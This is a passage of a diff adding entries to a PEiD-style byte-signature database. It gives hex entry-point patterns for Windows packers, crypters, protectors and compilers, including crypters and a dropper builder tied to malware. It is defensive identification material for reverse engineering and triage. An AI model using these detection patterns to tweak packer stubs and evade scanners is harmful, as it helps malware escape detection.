+signature = 55 8B EC 81 EC 20 02 00 00 53 56 57 6A 00 FF 15 18 61 40 00 68 00 70 40 00 89 45 08 FF 15 14 61 40 00 85 C0 74 27 6A 00 A1 00 20 40 00 50 FF 15 3C 61 40 00 8B F0 6A 06 56 FF 15 38 61 40 00 6A 03 56 FF 15 38 61 40 00 E9 36 03 00 00 68 02 7F 00 00 33 F6 56
+ep_only = true
+
+[CreateInstall v2003.3.5]
+signature = 81 EC 0C 04 00 00 53 56 57 55 68 60 50 40 00 6A 01 6A 00 FF 15 D8 80 40 00 8B F0 FF 15 D4 80 40 00 3D B7 00 00 00 75 0F 56 FF 15 B8 80 40 00 6A 02 FF 15 A4 80 40 00 33 DB E8 F2 FE FF FF 68 02 7F 00 00 89 1D 94 74 40 00 53 89 1D 98 74 40 00 FF 15 E4 80 40
+ep_only = false
+
+[Crinkler V0.1-V0.2 -> Rune L.H.Stubbe and Aske Simon Christensen]
+signature = B9 ?? ?? ?? ?? 01 C0 68 ?? ?? ?? ?? 6A 00 58 50 6A 00 5F 48 5D BB 03 00 00 00 BE ?? ?? ?? ?? E9
+ep_only = true
+
+[Crinkler V0.3-V0.4 -> Rune L.H.Stubbe and Aske Simon Christensen]
+signature = B8 00 00 42 00 31 DB 43 EB 58
+ep_only = true
+
+[Crunch 5 Fusion 4]
+signature = EB 15 03 ?? ?? ?? 06 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 55 E8
+ep_only = false
+
+[Crunch v4.0]
+signature = EB 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 E8 00 00 00 00 5D 81 ED 18 00 00 00 8B C5 55 60 9C 2B 85 E9 06 00 00 89 85 E1 06 00 00 FF 74 24 2C E8 BB 01 00 00 0F 82 92 05 00 00 E8 F1 03 00 00 49 0F 88 86 05 00 00 68 6C D9 B2 96 33 C0 50 E8 24
+ep_only = true
+
+[Crunch v5 -> Bit-Arts]
+signature = EB 15 03 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 68 00 00 00 00 55 E8 00 00 00 00 5D 81 ED 1D 00 00 00 8B C5 55 60 9C 2B 85 FC 07 00 00 89 85 E8 07 00 00 FF 74 24 2C E8 20 02 00 00 0F 82 94 06 00 00 E8 F3 04 00 00 49 0F 88 88 06 00 00 8B B5 E8 07 00
+ep_only = true
+
+[Crunch/PE]
+signature = 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85
+ep_only = true
+
+[Crunch/PE v1.0.x.x]
+signature = 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 09 C6 85
+ep_only = true
+
+[Crunch/PE v2.0.x.x]
+signature = 55 E8 ?? ?? ?? ?? 5D 83 ED 06 8B C5 55 60 89 AD ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 55 BB ?? ?? ?? ?? 03 DD 53 64 67 FF 36 ?? ?? 64 67 89 26
+ep_only = true
+
+[Crunch/PE v3.0.x.x]
+signature = EB 10 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 5D 81 ED 18 ?? ?? ?? 8B C5 55 60 9C 2B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? FF 74
+ep_only = true
+
+[Crunch/PE v4.0]
+signature = EB 10 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 5D 81 ED 18 ?? ?? ?? 8B C5 55 60 9C 2B 85 E9 06 ?? ?? 89 85 E1 06 ?? ?? FF 74 24 2C E8 BB 01 00 00 0F 82 92 05 00 00 E8 F1 03 00 00 49 0F 88 86 05 00 00 68 6C D9 B2 96 33 C0 50 E8 24
+ep_only = false
+
+[Cruncher v1.0]
+signature = 2E ?? ?? ?? ?? 2E ?? ?? ?? B4 30 CD 21 3C 03 73 ?? BB ?? ?? 8E DB 8D ?? ?? ?? B4 09 CD 21 06 33 C0 50 CB
+ep_only = true
+
+[CrypKey v5 - v6]
+signature = E8 ?? ?? ?? ?? 58 83 E8 05 50 5F 57 8B F7 81 EF ?? ?? ?? ?? 83 C6 39 BA ?? ?? ?? ?? 8B DF B9 0B ?? ?? ?? 8B 06
+ep_only = true
+
+[CrypKey V5.6.X -> Kenonic Controls Ltd.]
+signature = E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 00 75 07 6A 00 E8
+ep_only = true
+
+[CrypKey V5.6.X DLL -> Kenonic Controls Ltd.]
+signature = 8B 1D ?? ?? ?? ?? 83 FB 00 75 0A E8 ?? ?? ?? ?? E8
+ep_only = true
+
+[CrypKey V6.1X DLL -> CrypKey (Canada) Inc.]
+signature = 83 3D ?? ?? ?? ?? 00 75 34 68 ?? ?? ?? ?? E8
+ep_only = true
+
+[CRYPT Version 1.7 (c) Dismember]
+signature = 0E 17 9C 58 F6 ?? ?? 74 ?? E9
+ep_only = true
+
+[Crypter 3.1 -> SLESH]
+signature = 68 FF 64 24 F0 68 58 58 58 58 FF D4 50 8B 40 F2 05 B0 95 F6 95 0F 85 01 81 BB FF 68
+ep_only = false
+
+[Cryptic 2.0 -> Tughack]
+signature = B8 00 00 40 00 BB ?? ?? ?? 00 B9 00 10 00 00 BA ?? ?? ?? 00 03 D8 03 C8 03 D1 3B CA 74 06 80 31 ?? 41 EB F6 FF E3
+ep_only = true
+
+[Crypto-Lock v2.02 (Eng) -> Ryan Thian]
+signature = 60 BE 15 90 40 00 8D BE EB 7F FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47
+ep_only = true
+
+[Crypto-Lock v2.02 (Eng) -> Ryan Thian]
+signature = 60 BE 15 90 40 00 8D BE EB 7F FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0
+ep_only = true
+
+[Crypto-Lock v2.02 (Eng) -> Ryan Thian]
+signature = 60 BE ?? 90 40 00 8D BE ?? ?? FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0
+ep_only = true
+
+[CRYPToCRACk's PE Protector V0.9.2 -> Lukas Fleischer]
+signature = E8 01 00 00 00 E8 58 5B 81 E3 00 FF FF FF 66 81 3B 4D 5A 75 37 84 DB 75 33 8B F3 03 ?? ?? 81 3E 50 45 00 00 75 26
+ep_only = true
+
+[CRYPToCRACk's PE Protector V0.9.3 -> Lukas Fleischer]
+signature = 5B 81 E3 00 FF FF FF 66 81 3B 4D 5A 75 33 8B F3 03 73 3C 81 3E 50 45 00 00 75 26 0F B7 46 18 8B C8 69 C0 AD 0B 00 00 F7 E0 2D AB 5D 41 4B 69 C9 DE C0 00 00 03 C1
+ep_only = true
+
+[CrypWrap vx.x]
+signature = E8 B8 ?? ?? ?? E8 90 02 ?? ?? 83 F8 ?? 75 07 6A ?? E8 ?? ?? ?? ?? FF 15 49 8F 40 ?? A9 ?? ?? ?? 80 74 0E
+ep_only = true
+
+[Cygwin32]
+signature = 55 89 E5 83 EC 04 83 3D
+ep_only = true
+
+[D1NS1G -> D1N]
+signature = 18 37 00 00 00 00 00 00 01 00 0A 00 00 00 18 00 00 80 00 00 00 00 ?? ?? 18 37 00 00 00 00 02 00 00 00 88 00 00 80 38 00 00 80 96 00 00 80 50 00 00 80 00 00 00 00 ?? ?? 18 37 00 00 00 00 00 00 01 00 00 00 00 00 68 00 00 00 00 00 00 00 ?? ?? 18 37 00 00 00 00 00 00 01 00 00 00 00 00 78 00 00 00 B0 F0 00 00 10 00 00 00 00 00 00 00 00 00 00 00 C0 F0 00 00 60 00 00 00 00 00 00 00 00 00 00 00 06 00 44 00 56 00 43 00 4C 00 41 00 4C 00 0B 00 50 00 41 00 43 00 4B 00 41 00 47 00 45 00 49 00 4E 00 46 00 4F 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = false
+
+[D1S1G v1.1 Beta ++ Scrambled EXE -> D1N]
+signature = E8 07 00 00 00 E8 1E 00 00 00 C3 90 58 89 C2 89 C2 25 00 F0 FF FF 50 83 C0 55 8D 00 FF 30 8D 40 04 FF 30 52 C3 8D 40 00 55 8B EC 83 C4 E8 53 56 57 8B 4D 10 8B 45 08 89 45 F8 8B 45 0C 89 45 F4 8D 41 61 8B 38 8D 41 65 8B 00 03 C7 89 45 FC 8D 41 69 8B 00 03 C7 8D 51 6D 8B 12 03 D7 83 C1 71 8B 09 03 CF 2B CA 72 0A 41 87 D1 80 31 FF 41 4A 75 F9 89 45 F0 EB 71 8B
+ep_only = false
+
+[D1S1G v1.1 beta --> D1N]
+signature = 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 01 00 0A 00 00 00 18 00 00 80 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 02 00 00 00 88 00 00 80 38 00 00 80 96 00 00 80 50 00 00 80 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 01 00 00 00 00 00 68 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 01 00 00 00 00 00 78 00 00 00 B0 ?? ?? 00 10 00 00 00 00 00 00 00 00 00 00 00 C0 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 06 00 44 00 56 00 43 00 4C 00 41 00 4C 00 0B 00 50 00 41 00 43 00 4B 00 41 00 47 00 45 00 49 00 4E 00 46 00 4F 00 00 00
+ep_only = false
+
+[DAEMON Protect v0.6.7]
+signature = 60 60 9C 8C C9 32 C9 E3 0C 52 0F 01 4C 24 FE 5A 83 C2 0C 8B 1A 9D 61
+ep_only = true
+
+[DalKrypt 1.0 - by DalKiT]
+signature = 68 00 10 40 00 58 68 ?? ?? ?? 00 5F 33 DB EB 0D 8A 14 03 80 EA 07 80 F2 04 88 14 03 43 81 FB ?? ?? ?? 00 72 EB FF E7
+ep_only = true
+
+[DBPE v1.53]
+signature = 9C 55 57 56 52 51 53 9C FA E8 ?? ?? ?? ?? 5D 81 ED 5B 53 40 ?? B0 ?? E8 ?? ?? ?? ?? 5E 83 C6 11 B9 27 ?? ?? ?? 30 06 46 49 75 FA
+ep_only = true
+
+[DBPE v2.10]
+signature = 9C 6A 10 73 0B EB 02 C1 51 E8 06 ?? ?? ?? C4 11 73 F7 5B CD 83 C4 04 EB 02 99 EB FF 0C 24 71 01 E8 79 E0 7A 01 75 83 C4 04 9D EB 01 75 68 5F 20 40 ?? E8 B0 EF FF FF 72 03 73 01 75 BE
+ep_only = true
+
+[DBPE v2.10 -> Ding Boy]
+signature = EB 20 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? EB 58 75 73 65 72 33 32 2E 64 6C 6C ?? 4D 65 73 73 61 67 65 42 6F 78 41 ?? 6B 65 72 6E 65 6C
+ep_only = true
+
+[DBPE v2.33 -> Ding Boy]
+signature = EB 20 ?? ?? 40 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 9C 6A 10 73 0B EB 02 C1 51 E8 06 ?? ?? ?? C4 11 73 F7 5B CD 83 C4 04 EB 02 99 EB FF 0C 24 71
+ep_only = true
+
+[DBPE vx.xx -> Ding Boy]
+signature = EB 20 ?? ?? 40 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 9C 55 57 56 52 51 53 9C E8 ?? ?? ?? ?? 5D 81 ED
+ep_only = true
+
+[DCrypt Private 0.9b -> drmist]
+signature = B9 ?? ?? ?? 00 E8 00 00 00 00 58 68 ?? ?? ?? 00 83 E8 0B 0F 18 00 D0 00 48 E2 FB C3
+ep_only = true
+
+[DEF 1.0 -> bart/xt]
+signature = BE ?? ?? 40 00 6A ?? 59 80 7E 07 00 74 11 8B 46 0C 05 00 00 40 00 8B 56 10 30 10 40 4A 75 FA 83 C6 28 E2 E4 68 ?? ?? 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[DEF v1.0]
+signature = BE ?? 01 40 00 6A 05 59 80 7E 07 00 74 11 8B 46
+ep_only = true
+
+[DEF v1.0]
+signature = BE ?? 01 40 00 6A ?? 59 80 7E 07 00 74 11 8B 46 0C 05 00 00 40 00 8B 56 10 30 10 40 4A 75 FA 83 C6 28 E2 E4 68 ?? 10 40 00 C3
+ep_only = false
+
+[DEF v1.00 (Eng) -> bart/xt]
+signature = BE ?? 01 40 00 6A ?? 59 80 7E 07 00 74 11 8B 46 0C 05 00 00 40 00 8B 56 10 30 10 40 4A 75 FA 83 C6 28 E2 E4 68 ?? ?? 40 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[dePACK -> deNULL]
+signature = EB 01 DD 60 68 00 ?? ?? ?? 68 ?? ?? 00 00 E8 ?? 00 00 00
+ep_only = true
+
+[dePACK -> deNULL]
+signature = EB 01 DD 60 68 00 ?? ?? ?? 68 ?? ?? ?? 00 E8 ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? D2
+ep_only = true
+
+[Dev-C++ 4.9.9.2 -> Bloodshed Software]
+signature = 55 89 E5 83 EC 08 C7 04 24 01 00 00 00 FF 15 ?? ?? ?? 00 E8 C8 FE FF FF 90 8D B4 26 00 00 00 00 55 89 E5 83 EC 08 C7 04 24 02 00 00 00 FF 15 ?? ?? ?? 00 E8 A8 FE FF FF 90 8D B4 26 00 00 00 00 55 8B 0D ?? ?? ?? 00 89 E5 5D FF E1 8D 74 26 00 55 8B 0D
+ep_only = true
+
+[Dev-C++ v4]
+signature = 55 89 E5 83 EC 08 83 C4 F4 6A ?? A1 ?? ?? ?? 00 FF D0 E8 ?? FF FF FF
+ep_only = false
+
+[Dev-C++ v5]
+signature = 55 89 E5 83 EC 14 6A ?? FF 15 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00
+ep_only = false
+
+[DIET v1.00, v1.00d]
+signature = BF ?? ?? 3B FC 72 ?? B4 4C CD 21 BE ?? ?? B9 ?? ?? FD F3 A5 FC
+ep_only = true
+
+[DIET v1.00d]
+signature = FC 06 1E 0E 8C C8 01 ?? ?? ?? BA ?? ?? 03 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00
+ep_only = true
+
+[DIET v1.02b, v1.10a, v1.20]
+signature = BE ?? ?? BF ?? ?? B9 ?? ?? 3B FC 72 ?? B4 4C CD 21 FD F3 A5 FC
+ep_only = true
+
+[DIET v1.44, v1.45f]
+signature = F8 9C 06 1E 57 56 52 51 53 50 0E FC 8C C8 BA ?? ?? 03 D0 52
+ep_only = true
+
+[Ding Boy's PE-lock Phantasm v0.8]
+signature = 55 57 56 52 51 53 E8 00 00 00 00 5D 8B D5 81 ED 0D 39 40 00
+ep_only = true
+
+[Ding Boy's PE-lock Phantasm v1.0 / v1.1]
+signature = 55 57 56 52 51 53 66 81 C3 EB 02 EB FC 66 81 C3 EB 02 EB FC
+ep_only = true
+
+[Ding Boy's PE-lock Phantasm v1.5b3]
+signature = 9C 55 57 56 52 51 53 9C FA E8 00 00 00 00 5D 81 ED 5B 53 40 00 B0
+ep_only = true
+
+[Ding Boy's PE-lock v0.07]
+signature = 55 57 56 52 51 53 E8 00 00 00 00 5D 8B D5 81 ED 23 35 40 00
+ep_only = true
+
+[diPacker V1.X -> diProtector Software]
+signature = 0F 00 2D E9 01 00 A0 E3 68 01 00 EB 8C 00 00 EB 2B 00 00 EB 00 00 20 E0 1C 10 8F E2 8E 20 8F E2 00 30 A0 E3 67 01 00 EB 0F 00 BD E8 00 C0 8F E2 00 F0 9C E5
+ep_only = true
+
+[diProtector V1.X -> diProtector Software]
+signature = 01 00 A0 E3 14 00 00 EB 00 00 20 E0 44 10 9F E5 03 2A A0 E3 40 30 A0 E3 AE 00 00 EB 30 00 8F E5 00 20 A0 E1 3A 0E 8F E2 00 00 80 E2 1C 10 9F E5 20 30 8F E2 0E 00 00 EB 14 00 9F E5 14 10 9F E5 7F 20 A0 E3 C5 00 00 EB 04 C0 8F E2 00 F0 9C E5
+ep_only = true
+
+[DJoin v0.7 public (RC4 encryption) -> drmist]
+signature = C6 05 ?? ?? 40 00 00 C6 05 ?? ?? 40 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[DJoin v0.7 public (xor encryption) -> drmist]
+signature = C6 05 ?? ?? 40 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[DotFix Nice Protect 2.1 -> GPcH Soft]
+signature = E9 FF 00 00 00 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 13 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 8E 02 D2 75 05 8A 16 46 12 D2 C3 33 C9 41 E8 EE FF FF FF 13 C9 E8 E7 FF FF FF 72 F2 C3 2B 7C 24 28 89 7C 24 1C 61 C3 60 B8 ?? ?? ?? ?? 03 C5 50 B8 ?? ?? ?? ?? 03 C5 FF 10 BB ?? ?? ?? ?? 03 DD 83 C3 0C 53 50 B8 ?? ?? ?? ?? 03 C5 FF 10 6A 40 68 00 10 00 00 FF 74 24 2C 6A 00 FF D0 89 44 24 1C 61 C3
+ep_only = false
+
+[DotFix NiceProtect vna]
+signature = 60 E8 55 00 00 00 8D BD 00 10 40 00 68 ?? ?? ?? 00 03 3C 24 8B F7 90 68 31 10 40 00 9B DB E3 55 DB 04 24 8B C7 DB 44 24 04 DE C1 DB 1C 24 8B 1C 24 66 AD 51 DB 04 24 90 90 DA 8D 77 10 40 00 DB 1C 24 D1 E1 29
+ep_only = true
+
+[Dr.Web Virus-Finding Engine -> InSoft EDV-Systeme]
+signature = B8 01 00 00 00 C2 0C 00 8D 80 00 00 00 00 8B D2 8B ?? 24 04
+ep_only = true
+
+[DragonArmor -> Orient]
+signature = BF 4C ?? ?? 00 83 C9 FF 33 C0 68 34 ?? ?? 00 F2 AE F7 D1 49 51 68 4C ?? ?? 00 E8 11 0A 00 00 83 C4 0C 68 4C ?? ?? 00 FF 15 00 ?? ?? 00 8B F0 BF 4C ?? ?? 00 83 C9 FF 33 C0 F2 AE F7 D1 49 BF 4C ?? ?? 00 8B D1 68 34 ?? ?? 00 C1 E9 02 F3 AB 8B CA 83 E1 03 F3 AA BF 5C ?? ?? 00 83 C9 FF 33 C0 F2 AE F7 D1 49 51 68 5C ?? ?? 00 E8 C0 09 00 00 8B 1D 04 ?? ?? 00 83 C4 0C 68 5C ?? ?? 00 56 FF D3 A3 D4 ?? ?? 00 BF 5C ?? ?? 00 83 C9 FF 33 C0 F2 AE F7 D1 49 BF 5C ?? ?? 00 8B D1 68 34 ?? ?? 00 C1 E9 02 F3 AB 8B CA 83 E1
+ep_only = false
+
+[Dropper Creator V0.1 -> Conflict]
+signature = 60 E8 00 00 00 00 5D 8D 05 ?? ?? ?? ?? 29 C5 8D 85 ?? ?? ?? ?? 31 C0 64 03 40 30 78 0C 8B 40 0C 8B 70 1C AD 8B 40 08 EB 09
+ep_only = false
+
+[DSHIELD]
+signature = 06 E8 ?? ?? 5E 83 EE ?? 16 17 9C 58 B9 ?? ?? 25 ?? ?? 2E
+ep_only = true
+
+[Dual's eXe 1.0]
+signature = 55 8B EC 81 EC 00 05 00 00 E8 00 00 00 00 5D 81 ED 0E 00 00 00 8D 85 08 03 00 00 89 28 33 FF 8D 85 7D 02 00 00 8D 8D 08 03 00 00 2B C8 8B 9D 58 03 00 00 E8 1C 02 00 00 8D 9D 61 02 00 00 8D B5 7C 02 00 00 46 80 3E 00 74 24 56 FF 95 0A 04 00 00 46 80 3E 00
+ep_only = true
+
+[Dual's eXe Encryptor 1.0b -> Dual]
+signature = 55 8B EC 81 EC 00 05 00 00 E8 00 00 00 00 5D 81 ED 0E 00 00 00 8D 85 3A 04 00 00 89 28 33 FF 8D 85 80 03 00 00 8D 8D 3A 04 00 00 2B C8 8B 9D 8A 04 00 00 E8 24 02 00 00 8D 9D 58 03 00 00 8D B5 7F 03 00 00 46 80 3E 00 74 24 56 FF 95 58 05 00 00 46 80 3E 00 75 FA 46 80 3E 00 74 E7 50 56 50 FF 95 5C 05 00 00 89 03 58 83 C3 04 EB E3 8D 85 69 02 00 00 FF D0 8D 85 56 04 00 00 50 68 1F 00 02 00 6A 00 8D 85 7A 04 00 00 50
+ep_only = true
+
+[dUP 2.x Patcher --> www.diablo2oo2.cjb.net]
+signature = 8B CB 85 C9 74 ?? 80 3A 01 74 08 AC AE 75 0A 42 49 EB EF 47 46 42 49 EB E9
+ep_only = false
+
+[dUP2 -> diablo2oo2]
+signature = E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 6A 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? A2 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? A2 ?? ?? ?? ?? 6A 00 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? A2 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 3C 01 75 19 BE ?? ?? ?? ?? 68 00 02 00 00 56 68
+ep_only = true
+
+[DxPack 1.0]
+signature = 60 E8 ?? ?? ?? ?? 5D 8B FD 81 ED ?? ?? ?? ?? 2B B9 ?? ?? ?? ?? 81 EF ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84
+ep_only = true
+
+[DxPack V0.86 -> Dxd]
+signature = 60 E8 00 00 00 00 5D 8B FD 81 ED 06 10 40 00 2B BD 94 12 40 00 81 EF 06 00 00 00 83 BD 14 13 40 00 01 0F 84 2F 01 00 00
+ep_only = true
+
+[DzA Patcher v1.3 Loader]
+signature = BF 00 40 40 00 99 68 48 20 40 00 68 00 20 40 00 52 52 52 52 52 52 52 57 E8 15 01 00 00 85 C0 75 1C 99 52 52 57 52 E8 CB 00 00 00 FF 35 4C 20 40 00 E8 D2 00 00 00 6A 00 E8 BF 00 00 00 99 68 58 20 40 00 52 52 68 63 10 40 00 52 52 E8 DB 00 00 00 6A FF FF 35
+ep_only = false
+
+[E language]
+signature = E8 06 00 00 00 50 E8 ?? 01 00 00 55 8B EC 81 C4 F0 FE FF FF
+ep_only = true
+
+[E.You.Di.Dai-> YueHeiFengGao]
+signature = 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 56 57 0F 31 8B D8 0F 31 8B D0 2B D3 C1 EA 10 B8 ?? ?? ?? ?? 0F 6E C0 B8 ?? ?? ?? ?? 0F 6E C8 0F F5 C1 0F 7E C0 0F 77 03 C2 ?? ?? ?? ?? ?? FF E0
+ep_only = true
+
+[E2C by DoP]
+signature = BE ?? ?? BF ?? ?? B9 ?? ?? FC 57 F3 A5 C3
+ep_only = true
+
+[EEXE Version 1.12]
+signature = B4 30 CD 21 3C 03 73 ?? BA 1F 00 0E 1F B4 09 CD 21 B8 FF 4C CD 21
+ep_only = true
+
+[Elicense System V4.0.0.0 -> ViaTech Inc]
+signature = 00 00 00 00 63 79 62 00 65 6C 69 63 65 6E 34 30 2E 64 6C 6C 00 00 00 00
+ep_only = false
+
+[Embed PE v1.13 -> cyclotron]
+signature = 83 EC 50 60 68 5D B9 52 5A E8 2F 99 00 00 DC 99 F3 57 05 68
+ep_only = true
+
+[EmbedPE 1.13 -> cyclotron]
+signature = 83 EC 50 60 68 5D B9 52 5A E8 2F 99 00 00 DC 99 F3 57 05 68 B8 5E 2D C6 DA FD 48 63 05 3C 71 B8 5E 97 7C 36 7E 32 7C 08 4F 06 51 64 10 A3 F1 4E CF 25 CB 80 D2 99 54 46 ED E1 D3 46 86 2D 10 68 93 83 5C 46 4D 43 9B 8C D6 7C BB 99 69 97 71 2A 2F A3 38 6B 33
+ep_only = true
+
+[EmbedPE V1.00-V1.24 -> cyclotron]
+signature = 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 00 00 00 00 00
+ep_only = false
+
+[EmbedPE v1.24 -> cyclotron]
+signature = 83 EC 50 60 68 ?? ?? ?? ?? E8 CB FF 00 00
+ep_only = true
+
+[EmbedPE V1.X -> cyclotron]
+signature = 83 EC 50 60 68 ?? ?? ?? ?? E8 ?? ?? 00 00
+ep_only = true
+
+[EncryptPE 1.2003.3.18-1.2003.5.18 -> WFS]
+signature = 60 9C 64 FF 35 00 00 00 00 E8 79 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73
+ep_only = true
+
+[EncryptPE 1.2003.5.18 -> WFS]
+signature = 60 9C 64 FF 35 00 00 00 00 E8 79
+ep_only = true
+
+[EncryptPE 2.2004.6.16-2.2006.6.30 -> WFS]
